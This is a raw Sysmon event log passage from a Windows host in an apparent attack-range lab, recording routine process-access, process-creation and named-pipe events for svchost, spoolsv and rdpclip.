12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7283536C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292251Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292250Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7283536C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|c:\windows\system32\lsm.dll+23fc9|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292249Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7283536C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23fc1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292248Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|c:\windows\system32\lsm.dll+23fc9|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292247Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23fc1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292246Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C1-6086-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{BEA10069-028B-6088-0C2A-00000000BB01}7148C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000292245Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0F00-00000000BB01}9365208C:\Windows\System32\svchost.exe{BEA10069-028B-6088-0C2A-00000000BB01}7148C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\termsrv.dll+47f71|c:\windows\system32\termsrv.dll+549f2|c:\windows\system32\termsrv.dll+22ee6|c:\windows\system32\termsrv.dll+22763|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 154100x8000000000000000292244Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.283{BEA10069-028B-6088-0C2A-00000000BB01}7148C:\Windows\System32\rdpclip.exe10.0.14393.3503 (rs1_release.200131-0410)RDP Clipboard MonitorMicrosoft® Windows® Operating SystemMicrosoft Corporationrdpclip.exerdpclipC:\Windows\system32\WIN-HOST-96\Administrator{BEA10069-D4AE-6086-06A6-0F0000000000}0xfa6062HighMD5=D887E718FB0F4C99B9F01C5BD59F8B90,SHA256=ACFA1128B4EDD953F6364FA6216337A59C0522A01349263A11259A827838A56F,IMPHASH=5A464814303942D42A66B561CF697F26{BEA10069-D0C2-6086-0F00-00000000BB01}936C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k termsvcs 18141800x8000000000000000292243Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-ConnectPipe2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0F00-00000000BB01}936\TSVCPIPE-e0582208-0b1b-4d6e-9177-8dab2eb6ce38C:\Windows\System32\svchost.exe 10341000x8000000000000000292242Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000292241Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-0F00-00000000BB01}936C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 18141800x8000000000000000292240Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-ConnectPipe2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0F00-00000000BB01}936\TSVCPIPE-e0582208-0b1b-4d6e-9177-8dab2eb6ce38C:\Windows\System32\svchost.exe 17141700x8000000000000000292239Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-CreatePipe2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0F00-00000000BB01}936\TSVCPIPE-e0582208-0b1b-4d6e-9177-8dab2eb6ce38C:\Windows\System32\svchost.exe 10341000x8000000000000000292238Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292237Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292236Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7283536C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292235Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7283536C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292234Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1900-00000000BB01}1844C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292233Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292232Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292231Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292230Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292229Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292228Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292227Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1900-00000000BB01}1844C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292226Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+